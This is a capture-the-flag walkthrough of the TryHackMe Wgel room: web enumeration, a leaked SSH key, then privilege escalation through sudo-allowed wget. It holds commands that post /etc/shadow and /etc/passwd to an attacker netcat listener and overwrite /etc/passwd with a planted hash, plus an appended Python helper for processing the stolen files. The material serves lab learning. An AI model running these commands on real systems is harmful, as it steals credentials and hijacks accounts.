Wgel CTF
Room Link: https://tryhackme.com/room/wgelctf
Scanning
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/80 - HTTP
The main page of the site is just the Apache default page, but in the page source there is an HTML comment mentioning someone named jessie, which gives a likely username for later.

Ran gobuster against the web root and found a site under /sitemap/; nothing really interesting about it when browsing.
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 
Running gobuster again against /sitemap/ with the same wordlist didn't turn up anything interesting either.
Kali
gobuster dir -u http://$VICTIM/sitemap/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt 
Ran dirb with its default wordlist against /sitemap/ and it found a .ssh folder containing an id_rsa private key, so I downloaded it and used it to log in. (dirb's default common.txt includes dotfile entries such as .ssh, which is the usual reason it finds this when the directory-list-2.3-medium.txt run above does not.)
Kali
dirb http://$VICTIM/sitemap/

Kali
chmod 600 id_rsa
ssh -v -i id_rsa jessie@$VICTIM
Victim
sudo -l
I tried cracking jessie's hash, since I would then be able to run any command with sudo, but I couldn't crack it. Documenting it anyway.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/shadow $KALI:4444
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444
Kali
nc -lvnp 4444
Each wget --post-file call sends the file as the body of an HTTP POST, so the listener has to be restarted for the second file, and wget hangs waiting for a reply that nc never sends (Ctrl-C it once the listener has printed the file). What nc captures starts with wget's request headers (POST / HTTP/1.1, User-Agent, Content-Length, ...) followed by a blank line; strip everything up to and including that blank line before saving the bodies as shadow.txt and passwd.txt, otherwise unshadow gets junk.
Kali
unshadow passwd.txt shadow.txt > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
Instead I changed the passwd file: I first downloaded it to Kali and changed the line for jessie so their password is now '123', then uploaded it back and became root. This works because a password field that is not 'x' is used directly, so /etc/shadow is no longer consulted for that user.
Victim
sudo -u root /usr/bin/wget --post-file=/etc/passwd $KALI:4444
Kali
nc -lvnp 4444
Line to change (only the second field changes, from x to an MD5-crypt hash for '123'; a hash of this form can be generated with openssl passwd -1 -salt new 123 or mkpasswd, and the rest of the line, including UID 1000, stays as it is)
jessie:$1$new$p7ptkEKU1HnaHpRtzNizS1:1000:1000:jessie,,,:/home/jessie:/bin/bash
Kali
python2 -m SimpleHTTPServer 81
Victim
sudo wget http://$KALI:81/passwd -O /etc/passwd
sudo -i
Note that the port in the download URL must match the one SimpleHTTPServer was started on (81 here), and that sudo -i now prompts for jessie's new password '123'. Since the edited line keeps UID 1000, this sets a known password for jessie rather than for root, so the root shell depends on what sudo -l reported for jessie; check that output before relying on this step.
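As an added example (not part of the original writeup), the two manual steps in this section done in Python: stripping wget's request headers from what nc captured so that unshadow gets a clean file, and rewriting jessie's line in the downloaded passwd the way the "Line to change" above does. The sample capture and passwd contents are constructed for the example, the hash value is the one from the writeup, and the script does not generate hashes (use openssl passwd -1 -salt new 123 or mkpasswd for that).

```python
"""Post-process a wget --post-file exfil capture and edit /etc/passwd.

Added example; not code from the Wgel writeup. Sample data is constructed.
"""

# Hash string copied from the writeup's "Line to change" (MD5-crypt, salt "new").
PAGE_HASH = "$1$new$p7ptkEKU1HnaHpRtzNizS1"

# Constructed /etc/passwd fragment standing in for the exfiltrated file.
SAMPLE_BODY = (
    b"root:x:0:0:root:/root:/bin/bash\n"
    b"jessie:x:1000:1000:jessie,,,:/home/jessie:/bin/bash\n"
)

# Constructed capture in the shape nc records from `wget --post-file=...`:
# request headers, an empty line, then the raw file bytes as the POST body.
SAMPLE_CAPTURE = (
    b"POST / HTTP/1.1\r\n"
    b"User-Agent: Wget/1.19.4 (linux-gnu)\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity\r\n"
    b"Host: 10.0.0.1:4444\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: %d\r\n"
    b"\r\n" % len(SAMPLE_BODY)
) + SAMPLE_BODY


def strip_http_headers(capture: bytes) -> bytes:
    """Return the POST body from a raw nc capture of a wget --post-file request.

    The body starts after the first empty line (CRLF CRLF). When wget sent a
    Content-Length header, use it to trim trailing bytes and to reject a
    capture that was cut short (e.g. the listener was killed too early).
    """
    head, sep, body = capture.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end-of-headers marker; not a complete HTTP request")
    length = None
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    if length is not None:
        if len(body) < length:
            raise ValueError(f"capture truncated: got {len(body)} of {length} bytes")
        body = body[:length]
    return body


def set_passwd_hash(passwd_text: str, user: str, pw_hash: str) -> str:
    """Return passwd_text with `user`'s password field replaced by pw_hash.

    Only the second field changes; UID, GID, GECOS, home and shell are kept,
    exactly like the writeup's edited jessie line. A non-'x' second field is
    used directly, so /etc/shadow is bypassed for that account.
    """
    if ":" in pw_hash or "\n" in pw_hash:
        raise ValueError("hash must not contain ':' or newline")
    out, found = [], False
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            fields[1] = pw_hash
            found = True
        out.append(":".join(fields))
    if not found:
        raise KeyError(f"user {user!r} not found in passwd data")
    return "\n".join(out) + "\n"


def passwd_overrides_shadow(passwd_text: str, user: str) -> bool:
    """True if `user`'s entry carries a real hash instead of 'x' or a lock marker."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[0] == user:
            return fields[1] not in ("x", "*", "!", "")
    return False


if __name__ == "__main__":
    body = strip_http_headers(SAMPLE_CAPTURE)       # what goes into passwd.txt
    edited = set_passwd_hash(body.decode(), "jessie", PAGE_HASH)
    print(edited, end="")                           # file to serve and re-upload
    print("shadow bypassed for jessie:", passwd_overrides_shadow(edited, "jessie"))
```

On a real capture, read the nc output as bytes (open(path, "rb")), not as text, or the CRLF handling breaks; the same header stripping applies to the shadow capture before it is handed to unshadow.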